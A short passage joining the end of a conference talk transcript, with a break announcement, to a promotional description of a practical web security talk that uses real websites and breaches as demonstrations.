put it into the Slido app and we'll be able to cover it later on. I think we get, what about another 15 minute break, Jacob? And then someone else can do some talking. Thanks, guys. Thank you.
There's a huge amount of information to absorb when it comes to web security but as broad as the discipline is, there are common patterns to look for. In this talk on the "essentials" of web security, we'll look beyond the headlines of commonly discussed risks and delve into details and demonstrations. It's a very practical look at online security in a way that everyone can absorb and take back to their everyday work with them. Many of the demos use real world websites and data breaches as examples – this is a very "real world" talk about the importance of web security.